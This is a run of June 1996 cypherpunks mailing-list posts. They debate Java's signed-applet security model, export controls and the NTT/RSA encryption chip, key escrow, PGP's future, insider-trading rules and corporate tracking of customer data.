> signed applets that can do anything.  What a let-down.

Well, it's not perfect, but I hold out the hope that real support for some
capability assignments can be provided by the time a serious infrastructure
of certificate authorities of some sort can develop.

Note also that this is not only a Sun issue; Netscape has to support it
all too.  Currently, note that the HotJava browser already allows some
configuration to the Security Manager that Netscape doesn't.

> Currently, the only safe way to run untrusted Java code is to not run it.
> This probably isn't going to change (see cpunks archives for reasons).  If
> Sun cannot prevent untrusted code from doing nasty things, how can they
> prevent code empowered with certain capabilities from doing things they are
> not certified to do? 

Huh?  They're explicitly saying that they won't make any attempt to prevent
signed applets from doing anything they want to do, if you tell the thing
that you trust a particular certificate.  Thus, you are now able to grant
complete trust to an applet with a given certificate.  You can't readily
do that now.

This means that if you trust the certificate system itself, then allowing
an applet from Borland or Microsoft or IBM to do whatever it wants to your
machine is about the same risk as allowing a program on CD-ROM from Borland
or Microsoft or IBM to do whatever it wants to your machine.

> It now seems that all the effort, time, and money to
> move towards Java over another OO language was a waste in a way since it no
> longer appears to have any security advantages. 

I think you need to explain this; it seems to have nothing to do with
the issue at hand.

> I wonder if Borland realizes that instead of putting so much time, effort,
> and money into someone else's product, Java, they could have just
> implemented signed Delphi code and gotten basically the same thing.  I 
> guess they didn't think of it in time.

Based on the state of the Borland Java stuff I've seen, I wouldn't have 
very high expectations in the Delphi department.

> You have to hand it to Sun/JavaSoft's marketing team, though.  While others
> have tried, few have been so successful at creating an "industry standard"
> from nothing.  Indeed, the only reason left to use Java is "because everyone
> else is into it..."

And for some applications (webish ones included or not) that's actually
a very good reason.  Business is business.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 4 Jun 1996 13:43:11 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: IR Cameras
In-Reply-To: <199606030534.AAA13745@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.960603192706.20627D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Sun, 2 Jun 1996 20:19:34 -0700
> > From: tcmay@got.net (Timothy C. May)
> > Subject: Re: opinions on book "The Truth Machine"
> > 
> > Today's newspaper (SJ Mercury News) carried a long article about
> > increasingly ubiquitous video surveillance cameras, and singled out the
> > U.K. as a place that is leading. Apparently even small villages have 50 or
> > more cameras scattered around...men have been arrested for urinating in
> > bushes outside pubs, caught by the infrared pickups (I hadn't thought about
> > the cameras being IR, but this makes sense, as a large fraction of street
> > crimes take place in dark or semidark areas).
> 
> Here in Austin, TX there is at least 1 IR camera located at the top of the
> police building downtown (8th & IH-35). Many intersections have stoplight
> synchronized cameras for getting license plates of red light runners (eg N.
> Lamar & 51st). I know the output of the cameras is cabled off-pole (can see
> the cables) to a NEMA style box. Don't know the format from there. It would
> be no technological leap to buy cable channels and mux the pictures back to a
> centralized site. This city is lousy with cable and fiber and the city
> bought in from the get-go with a project called I-Net in the mid-80's.


Defense to all photo plate takers is best found in the back of Car and 
Driver in the form of a polarized plastic plate that is opaque at angles 
greater than about ten degrees.

> 
>                                                      Jim Choate
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 4 Jun 1996 14:20:22 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <add8f03a0b02100404cb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:46 AM 6/4/96, qut@netcom.com wrote:
>ncr terminals are the most 31173 D0Dz

Kenneth, what is the frequency? Kenneth, what is the frequency?


--John Hinckley, First Disciple of AP








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 4 Jun 1996 15:19:33 +0800
To: cypherpunks@toad.com
Subject: [NOISE] rec.music.white-power failed 592:33033 FYI
Message-ID: <Pine.GUL.3.93.960603204158.28894B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The official result, including the votetaker's explanation for the
extraordinary delay (which makes interesting reading), is in
news.announce.newgroups, Message-ID <833851386.24895@uunet.uu.net>. Or for
people who only use Netscape: 

 http://ww2.altavista.digital.com/cgi-bin/news?plain@msg@31323@news%2egroups
 news:833851386.24895@uunet.uu.net

While I think I was one of the people presenting legitimate reasons for
voting no (as opposed to all the "VOTE NO ON NAZIS!" -- see news.groups
archives), I'm actually disappointed that there were only 592 yes votes. I'd
have expected more than the estimated 400 anti-censorship and spam-annoyance
reactions. 

I would urge people NOT to download the 3MB list of votes, as I haven't,
because the vast majority of voters had no clue what they were voting on. 
The majority probably thought it was a secret ballot. 

The poor votetaker definitely deserves a medal, but PLEASE don't send him
appreciative mail;  he's getting far too much already. 

Sent separately to fight-censorship and cypherpunks. Followup discussion, if
any, belongs in news.groups ONLY.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 4 Jun 1996 15:14:16 +0800
To: cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <add8fe620f021004583b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:59 PM 6/3/96, Deranged Mutant wrote:
>On  3 Jun 96 at 11:27, Bruce Baugh wrote:
>
>> Date:          Mon, 03 Jun 1996 11:27:33 -0700
>> At 04:33 AM 6/3/96 +0000, Deranged Mutant wrote:

>> does, it will happen only after the passage of more draconian anti-privacy
>> laws, and the guys working on it will be forced to include sundry backdoor
>> stuff or drop it altogether.
>
>More likely drop it altogether, or be openly admit they were forced
>to include GAK (people will want the source, anyway).

I can't imagine _any_ set of circumstances which would cause Zimmermann,
Atkins (?), Plumb (?), and anyone else who might still be on the PGP
development team to include GAK.

After all, those heartwarming stories about Burmese rebels using PGP to
communicate using laptops in the jungles would then be replaced by:

"16 April 1998, A.P., Rangoon, Burma. Internal Security Minister Bopalong
Myanmoon announced today that rebel communications were intercepted and
decrypted two weeks ago with the cooperation of the International Key
Authority. As a result of this raid, 63 rebels were captured, tried, and
executed. Visiting Rangoon at the time, U.S. Attorney General Louis Freeh
was said to be satisfied that international key escrow was having such
positive effects."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 4 Jun 1996 16:48:15 +0800
To: cypherpunks@toad.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606032029.QAA05821@jekyll.piermont.com>
Message-ID: <P74yoD45w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Jeff Barber writes:
> > I trust it won't stun you to find that many, many large and even small
> > corporations -- including my current employer [*NOT* SecureWare, BTW,
> > despite the email address] -- actually encourage their employees to buy
> > stock by offering stock purchase plans as a benefit of employment.
>
> Yup. Indeed, its perfectly legal and even common to trade in the stock
> of your own company, even if you are a corporate officer. HOWEVER,
> that doesn't mean that you are safe against insider trading charges.

High-level corporate officers have to file a special form with the SEC
whenever they trade the stock of their corporation. This information is
then publicly available. The Wall St. Journal reports monthly on large
insider trades reported to the SEC. I'm aware of at least one service (in
Florida) that takes the paper forms from SEC, does data entry, and sells
the data in computer-readable form.

Several studies showed something interesting:

a) If someone trades with the insiders, s/he'll have the same returns as
the market or worse;

b) If someone follows only the highest-level insiders (directors and CEO's)
as soon as their trades become known (which is about 4 weeks after the trade),
they'll generally beat the market.

This seems to indicate that a) insiders on the average are misguided,
b) highest level insiders do profit from their insider knowledge.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 4 Jun 1996 15:59:38 +0800
To: cypherpunks@toad.com
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <Pine.SV4.3.91.960603173332.27162B-100000@larry.infi.net>
Message-ID: <Ra6yoD47w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:
> US SEcret Service was always on top of criminal counterfeiting. I make
> that "criminal" distinction becaue there is allegedly a phenomenon of
> low-intensity-warfare going on, with Iran sponsoring more-or-less perfect
> counterfeits of hundred dollar bills.

I wonder what would happen if someone posted PostScript code for printing
counterfeit money on a color printer? :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 4 Jun 1996 15:42:37 +0800
To: cypherpunks@toad.com
Subject: Markoff in NYT on NTT/RSA chip
Message-ID: <Pine.3.89.9606032128.A10202-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Heh. You read it first in the CyberWire Dispatch Brock and I put out 
earlier tonight. :)

-Declan

---

Japanese Data-Scrambling Chip Renews Debate

      By JOHN MARKOFF
      
     
     
     
     
     W ASHINGTON -- Nippon Telegraph and Telephone Corp. has quietly
     begun selling a powerful data-scrambling chip set that is likely to
     undermine the Clinton administration's efforts to restrict the
     export of the fundamental technology for protecting secrets and
     commerce in the information age.
     
     The existence of the two-chip set, which will have broad potential
     application for local computer networks, the Internet and telephone
     switching networks, was disclosed in Washington in a speech Monday
     at a public policy workshop by the chief executive of RSA Data
     Security, a Silicon Valley-based company that has frequently dueled
     with the administration over its export-control policies.
     

[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 4 Jun 1996 14:22:36 +0800
To: hoz@univel.telescan.com (rick hoselton)
Subject: Anonymous stock TRADING (was Saw this on CNN: )
In-Reply-To: <199606032018.NAA03658@toad.com>
Message-ID: <199606040240.VAA31145@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


rick hoselton wrote:
> 
> You might also want to ask Ivan Boeskey(sp?).  I think he's out of 

Boesky.

Which brings up another ignorant question: suppose that I am a 
corporate officer who does receive substantial "insider" information,
for example results of audits, before they become public. What would
prevent such an insider from creating a phony offshore trading company,
and sending orders to that company using cypherpunks technology? 

If we suppose that the agent executing trades (which may even be a
computer, afaik) is trustworthy, the methods to deliver trade orders are
reliable, the computers are protected from van eyck monitoring, and the
officer is not spending too much money openly, what is there to prevent
or prove such violations of the law?

For example, the trading computer can have pseudonym address
xyz@alpha.c2.org, forwarded through a chain of remailers to
place_order@offshore.com.xx, and the officer sends pgp signed and
encrypted trade orders to that address, again through remailers.  What
besides traffic analysis is there to stop such violations?

Thanks,

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 4 Jun 1996 14:00:45 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <199606040228.WAA17430@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jun 96 at 11:27, Bruce Baugh wrote:

> Date:          Mon, 03 Jun 1996 11:27:33 -0700
> At 04:33 AM 6/3/96 +0000, Deranged Mutant wrote:
> 
> >In part because it's not well integrated with mailers.  That could 
> >change with a PGP3 DLL.
> 
> I have a growing feeling that PGP 3 is never going to happen. Or that if it

I'm soft-of having that feeling too.  Or what's going to happen is 
that enough people will get impatient and international versions will 
start to appear.

> does, it will happen only after the passage of more draconian anti-privacy
> laws, and the guys working on it will be forced to include sundry backdoor
> stuff or drop it altogether.

More likely drop it altogether, or be openly admit they were forced 
to include GAK (people will want the source, anyway).

> I suspect someone could do quite nicely by going ahead and developing a
> 2.6.2 or 2.6.3 DLL.

There's been talk.  But just talk.


Rob.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 14:23:04 +0800
Subject: Re: Java Crypto API questions
In-Reply-To: <199606040113.SAA02369@springbank.eng.sun.com>
Message-ID: <199606040200.WAA06306@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Benjamin Renaud writes:
> >Good thing Sun is spending millions pushing a brand-new language
> >down our throats so we can do nothing we couldn't already do.
> >After all the hype about security, security models, and sandboxes
> >we get signed applets that can do anything.  What a let-down.
> 
> Just to clarify a couple of things. We're not pushing anything down
> your throat. You are still perfectly free to use Visual C++ if that is
> what you prefer.

Why, thank you. However, you haven't answered Mr. Lowenstern's point.

Once you start signing Java apps, and executing them based on the
trust implied in the signature, you really didn't need Java in the
first place. You could just download and execute programs of any sort.

Frankly, I really dislike the idea of my users downloading arbitrary
apps all day long onto their workstations and running them. I'm not
sure it really buys you too much, either, other than loss of security.

> - We think that the ability to let applets have free reign is
> useful,

Lots of things are useful. Security often "gets in the way". However,
as mature engineers operating in an environment where many users have
highly mission critical equipment, some of us try to be more
responsible than that.

> The important thing to remember is that we're not going to come out
> with an implementation and claim to have solved the capabilities model
> problem.
> 
> We're taking a first step at using signatures with Java for security
> purposes, but this is only a first step. We remain fully committed to
> finer and more powerful security models. Note that an application
> written to the Java platform will be able to implement security
> policies based on digital signatures which are not fully permissive.

Java's security has always lacked defense in depth, continues to lack
defense in depth, probably cannot be retrofitted to gain defense in
depth, and is likely going to continue to be periodically
penetrated. Java security continues to rely on the "all portions of
the system are perfectly implemented" model, which as I have
repeatedly noted in this forum is fundamentally flawed because humans
can never produce perfectly designed and implemented systems. A system
that was built to be failure tolerant would be better, but that isn't
what you have proposed.

I have a great fear. My great fear is that once you've solved the
obvious and stupid problems and hyped how Java has become secure
(which will doubtless make the stock market analysts happy), people
may start to trust Java, and then, without warning, one day the evil
applets on the web pages aren't going to be mere demonstrations any
more but are going to be real nasty things that do stuff like embezzle
money from your brand new funky ecash purse or whatever. At that
point, it will be way too late to do anything because of all the Java
crud pervading the net that all the users will insist on having access
to.

All this, mind you, to get fancy animation on web pages, and damn
little else worthwhile.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 4 Jun 1996 14:25:51 +0800
To: cypherpunks@toad.com
Subject: CWD: "Jacking in from the "One that Got Away" Port
Message-ID: <v01510105add95b2fda0a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


(By Brock Meeks / brock@well.com / Archived at http://www.cyberwerks.com/)


 CyberWire Dispatch // Copyright (c) 1996 //

 Jacking in from the "One that Got Away" Port:

 Washington, DC -- President Clinton call your spooks, get FBI Director
 Louis Freeh on the phone.   Tell them to order in pizza.  Bill, it's
 going to be a long night.   All your plans to hold the U.S. crypto
 market hostage have just been fucked... and you didn't even get kissed.

 A virtual tactical nuke was hurled into the arcane subculture of
 encryption technology Monday when RSA President Jim Bizdos revealed
 that his company's Japanese subsidiary had developed a monster chipset
 capable of scrambling voice and data real time with a so-called "key
 length" of up to 1024 bits.

 That key length stuff is just so much gibberish to those playing
 without a scorecard, so let me drill down on it for you.  Basically,
 the longer the key length, the harder it is for a message to be broken
 by "brute force" automated attacks.  Current U.S. laws prohibit the
 export of any encryption device with a key length longer than 40-bits,
 or roughly the equivalent of  Captain Crunch decoder ring. For hardcore
 math types, I'm told that a 1024-bit key length is 10 to the 296th
 power more difficult to break than 40 bits.

 Bizdos, speaking during lunchtime at the Electronic Privacy Information
 Center (EPIC) 6th Cryptography and Privacy conference, told how his
 Japanese based company, Nihon-RSA, developed a set of two chips capable
 of scrambling messages at a level that will make the spooks in the
 Puzzle Palace (the National Security Administration) cough up hair
 balls that would make the First Cat Socks envious.

 Bizdos seems to have found crypto's magic bullet;  a legit way to
 essentially give the finger to U.S. export laws for crypto product. For
 years now the White House has been locked into a kind of crypto war.
 The Administration insists that strong encryption products must not be
 exported for fear that "terrorists, child pornographers and drug
 barons" and a rabble of assorted "bad guys" would snag the technology
 and proceed to plot the destruction of the "World As We Know It"... or
 at least Western Democracy, if the inbred Iranians got in line first.

 The White House crypto-fascist team, led by the NSA, FBI and assorted
 military hawks, have offered braindead compromise plans, including
 three versions of the "Clipper Chip."  This is a plan whereby you can
 buy strong locks for your data with the simple caveat that when you buy
 and use the products, you have to put the decoding key "in escrow."
 This way if a law enforcement agency ever has the need to unscramble
 any of your messages -- without you knowing it -- they can simply ask
 for these escrowed keys and have them handed over.  Yes, even your
 local sheriff's department can ask for the keys.

 Now, the government promises it will use this power only for good and
 never for evil.  Honest, that's what they say.  Of course, the Justice
 Department, in writing the rules for getting the keys, totally absolves
 any law enforcement agency of all harm if this power is abused in any
 way. Oh.. and if that power is abused, the sheriff or the FBI or
 fucking Park Police for that matter,  can still use any "evidence" they
 gin up on you.  Honest, I'm not making any of this stuff up.

 So the battle has raged.   The industry has been loathe to develop such
 products only for the American market because the cost of producing
 essentially duplicate products for domestic and foreign markets just
 wouldn't be cost effective.

 So, you and I are stuck having to use some pretty tedious encryption
 technologies, such as PGP (Pretty Good Privacy), which is great, but
 tough to use.  Or we can use the Captain Crunch Decoder ring
 equivalents available off the shelf. In the meantime, other countries
 are happily making and distributing robust encryption technologies, at
 a possible loss of up to $60 billion for U.S. companies.

 In fact, it's a crime even to put a program like PGP on your laptop and
 go overseas.   The State Department calls that "exporting."  The
 government recently dropped a case against Phil Zimmermann, the
 inventor of PGP, after putting him through several hellish years in
 which they threatened to toss his ass in jail.  There Phil would  no
 longer be a threat to society at-large, but instead become a
 "girlfriend" for a 265 pound felon named Spike.   Phil's "crime"??
 That somehow his PGP app had been uploaded on to the Internet and
 whisked around the world.  Phil didn't do it, but the U.S. government
 cried "export violation," anyway, eventually telling him, "Oh, never
 mind."

 So Bizdos, tired of fighting the wars here, enlisted the help of the
 Japanese.   After setting up his Japanese unit, he hired a crack team
 of Japanese crypto experts who essentially "reverse engineered" the
 company's own U.S. crypto product, according to Kurt Stammberger, RSA
 director of technology marketing.  It was a brilliant move.   Bizdos
 can't be slammed by the State Department for violating crypto export
 laws because, well, he didn't export a damn thing, except some U.S.
 greenbacks, which of course, could have gone to U.S. cryptographers,
 but let's not quibble about jobs.

 Anyone want to kick around the subject of global competitiveness?

 What's happened here is the Japanese have now trumped the entire world
 on the crypto market.   What's more, Clinton's brain-dead allegiance to
 the FBI, et al., has now allowed the Japanese government, which still
 owns a large share of NTT, which owns a minority share of RSA's
 Japanese subsidiary, to have a lock on the world's strongest encryption
 technology.   Can you say "Remember the VCR"  or "Remember the
 Semiconductor" or how about "Thanks, Bill.  We're fucked."

 The boys in the Pentagon made a stink a few years ago when a Japanese
 company made a play for Fairchild, a top defense contractor.  It was
 feared that the Japanese, by swallowing up the U.S. company, would also
 gain access to technologies vital to the U.S. military.   The deal was
 squashed.  Natch... now it looks like the G.I.'s with the stars on
 their shoulders have just put their spit-shined combat boots up their
 own ass by supporting Clinton and his continued ban on crypto exports.

 "We truly have ceded this market Japanese companies," Bizdos said.
 "It's almost too late to turn it around."  Some 15 COUNTRIES have
 already placed orders for these chips, Bizdos said, adding that the
 Japanese will not build the chips with a key escrow function.

 EPIC Director Marc Rotenberg said he was told by a Japanese
 representative that the country's constitution wouldn't allow key
 escrow because it doesn't allow wire-tapping.  Umm... maybe the
 Japanese just don't have *really* bad guys like the FBI assumes we have
 here.

 What's more, Bizdos says the deal with NTT is "no coup."  He says the
 Germans and French "aren't far behind" in developing similar
 technologies.   The RSA bombshell "fuels the argument that this stuff
 can't be contained in our own borders," said PGP's Zimmermann.

 Just how the relationship between NTT and RSA works out isn't set,
 Bizdos acknowledged.  "They'll pay us a royalty for the chips they
 sell," he said. "We're working it all out."

 Meanwhile, from my office window here in DC I've already counted 17
 Domino's Pizza delivery bikes go screaming by on their way to the White
 House.  Through my telescope I can see the White House balcony;  it
 looks like Bill is sick, like he's just heard some "really bad news."
 And behind him, just inside the double-doors, on a persian rug placed
 there by Warren G. Harding, I think Socks the Cat has just coughed up a
 hairball... or maybe it was Louis Freeh.  From this angle, I just can't
 be sure.

 Meeks out...

 ------------

 Additional reporting by Declan McCullagh (declan@well.com)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 14:22:19 +0800
To: cypherpunks@toad.com
Subject: Java
Message-ID: <199606040222.WAA06345@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been rather hard on Java here lately.

I'd like to state, for the record, that I have nothing against the
folks at Sun. They are good, smart people, and I'm sure they mean
well and aren't in on some evil plot. However, that doesn't make Java
a good idea.

For at least twenty or more years, people have known that for the
ultimate in multimedia email or what have you all you would need to do
is make the recipient execute a program that you sent them. This
obviates all the questions of having to figure out what sort of things
you would want to send -- if you can execute a program, you can do
anything. Unfortunately, this is also so phenomenally obvious a
security problem that no one ever proposed it as anything more than a
joke -- until now.

Sun is, unfortunately, suffering from a substantial hubris problem. As
I have noted, the original Java applet security model and all the
followups have had exactly the same problem -- they depend on perfect
implementation of every element of the security model for the security
to work, instead of having the realistic and conservative assumption
that portions of the model will be misimplemented, and designing for
defense in depth.

Beyond that, however, they have created the ultimate hype
monster. Java is a neat idea looking for a good application. I use the
web all day long and I have yet to see a good use for Java. We have,
essentially, mortgaged our system security for almost nothing better
than the occassional gee whiz animation that could have been
implemented with a safe graphics description format instead of a
turing equivalent language.

Again, I don't hate the Sun people or hold any animosity towards
them. However, I will point out the lesson that any good student of
Greek Tragedies could tell you -- the gods punish hubris, and severely.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 4 Jun 1996 15:47:18 +0800
To: Senator Exon <remailer@2005.bart.nl>
Subject: Re: Something that just crossed my mind. Sorry.
In-Reply-To: <199606030519.HAA08335@spoof.bart.nl>
Message-ID: <Pine.LNX.3.93.960603221736.3849C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Senator Exon wrote:
> At 10:01 AM 5/31/96 -0700, Sandy wrote:
> >At 10:35 PM 5/30/96 -0500, snow wrote:
> >>It is my position (until proven wrong--please) that larger business DON'T
> >>want anonymity. They _want_ to be able to track purchases and use of their
> >>product for several reasons. 

> Let me first claim that I am an employee of a "larger business."  Not
> that unless someone tracks me through the remailers is there any proof
> of that, but accept for now that it's not outside of the realm of
> possibility. 

> I wish I could prove you wrong.  I can inform you that you are correct,
> actually.  There are large retail companies that track sales data on
> credit card account numbers and cardholder names in direct violation of
> any contract you may have with American Express (and possibly Visa and
> others, I have not seen those contracts).  The data they capture is
> pretty impressive.  I'm sure most of you probably get a direct mailing
> or two from them every now and then, based on your shopping habits. 

	Hell, I just paid off all my credit cards, and they are in the
process of decomposing. Credit is evil. Cash is much more difficult to
track, and it is much harder to spend much beyond your means when paying
cash.

> >2)      Big businesses are made up of individuals.
> >        Most individuals would still prefer to have 
> >        their own privacy preserved even if they would 
> >        prefer less privacy for others.  
> 
> All it takes is one well-positioned executive who values profits more
> than his own privacy to say "Capture this personal data" and that data
> gets captured, regardless of who gets fired complaining about it.  Trust
> me.  And I value my job more than I value your privacy, which is why
> this is going out through a remailer. 

	Also remember, people like to live. They like their children to
live. Governments are made of people, Governments start wars and get the
population to go along with it. 
	
	Bigger Corporations are like governments. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 4 Jun 1996 16:08:34 +0800
To: perry@piermont.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606032029.QAA05821@jekyll.piermont.com>
Message-ID: <199606040227.WAA16036@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:

> Jeff Barber writes:

> > So perhaps Tim over-simplified by saying that there were no limits on
> > what ordinary employees could do.  OTOH, it seems that Perry also
> > over-simplified by flatly stating that Tim's trades while an Intel
> > employee were "illegal".
> 
> First of all, I never said that Tim's trades were illegal -- indeed, I
> never mentioned Tim except to say that following his advice didn't
> seem like a particularly safe course to take. Second of all, I can't
> comment on whether Tim's trades were within the letter of the law or
> not. Indeed, it would be difficult even if one knew all the
> circumstances since the definition of "material non-public
> information" is so hard to pin down.

In response to Tim's message wherein he described trading in Intel
stock while an employee there, you wrote (in message
<199606031523.LAA05288@jekyll.piermont.com>):

> >                          Under the rules, if you have nonpublic
> > information, even if you are not a corporate officer, you are an
> > insider for purposes of "insider trading" and your trades are illegal.

Sorry if I misinterpreted this.


> The point of all this was not that one shouldn't participate in the
> employee payroll stock purchase plan. The point was that a random
> person on the street who gets told a 'hot tip' is probably subject to
> the insider trading laws, never mind that he wasn't an employee or
> what is conventionally thought to be an "insider".

OK.  The only point I want to make is that thousands of us do this to
some extent every year and the risk apparently isn't terribly high.
Each person who works for a large corporation has *some* "non-public
information" which helps them decide whether to participate in the
stock purchase plan next year.  (Obviously if I think the company's
going to tank, I won't buy any more shares.)  I haven't seen anyone
attempt to define "material" but I'll concede that it's vague enough
to be dangerous to anyone whose trades are large enough to attract
attention.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 4 Jun 1996 16:02:33 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: MOSS vs. S/MIME vs. PGP/MIME Matrix (fwd)
Message-ID: <199606040330.WAA26234@homeport.org>
MIME-Version: 1.0
Content-Type: text


----- Forwarded message from Rik Drummond -----

>From ietf-request@IETF.CNRI.Reston.VA.US  Thu May 30 09:26:53 1996
Message-Id: <v02130500add3465435b8@[199.184.212.213]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 30 May 1996 08:05:48 -0500
To: ietf-ediint@imc.org,
        Electronic Data Interchange Issues <EDI-L@uccvma.ucop.edu>,
        ietf@CNRI.Reston.VA.US
Sender: ietf-request@IETF.CNRI.Reston.VA.US
From: Rik Drummond <drummond@onramp.net>
Subject: MOSS vs. S/MIME vs. PGP/MIME Matrix
Source-Info:  From (or Sender) name not authenticated.


The EDI over Internet (EDIINT) working group will recommend standards which
facilitate "EDI interoperability over Internet  - Now" during the third
quarter of 1996.

Two of the many requirements are the implementation of encryption and
signature for EDI transactions using existing standards/products, such as:
MOSS, S/MIME, PGP/MIME and DMS.

These four standards/products "generally" fit the needs of the EDIINT
effort. We must choose those that best fit our requirements. A Comparison
Matrix compares the products/standards across over 30 technical and
business areas.  Please take time to contribute your expertise to the
effort by commenting on the existing information.

This matrix is the basis for determining which security
products/standards/algorithms to use for EDI over Internet. The matrix is
also a significant  tool for selling our final  recommendation to EDI
business product development management.

The comparison matrix is in html format at
http://ftp.sterling.com/edi/ietf-ediint/decision.html.


Thank you.

Rik Drummond
Chair EDIINT

------------------------------------------------------
|         Rik Drummond - The Drummond Group         |
|   5008 Bentwood Ct., Ft. Worth, TX 76132 USA  |
|        Voice: 817 294 7339    Fax: 817 294 7950     |
------------------------------------------------------


----- End of forwarded message from Rik Drummond -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gcjones@ix.netcom.com
Date: Tue, 4 Jun 1996 17:11:02 +0800
To: cypherpunks@toad.com
Subject: Editorial on Crypto Policy -- 6/3/1996 Sacramento Bee
Message-ID: <1.5.4.16.19960603213652.224f84fa@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thought y'all might find this interesting: 


Editorial in The Sacramento Bee, June 3, 1996
---------------------------------------------

THE VALUE OF ENCRYPTION

	In a report commissioned by Congress, the National Research Council has
injected some perspective into the noisy and often uncivil debate over
encryption of electronic communications.  Although the Clinton
administration shows no signs of heeding the NRC's advice, Congress will
find the NRC recommendations an excellent guide to national encryption policy.

	For years, the extremes in the debate over the administration's efforts to
restrict the use of encryption have focused on rival bogeys.  Intelligence
and law enforcement have warned of the specter of terrorist or criminal
groups able to use encryption to prevent detection by wiretapping.  In
reply, civil libertarians opposed to Clinton administration efforts to
promote an encryption standard that would leave government agencies with the
key to open up all communications to scrutiny have held up the specter of
"Big Brother."

	By contrast, the NRC panel -- which was chaired by Kenneth Dam, a deputy
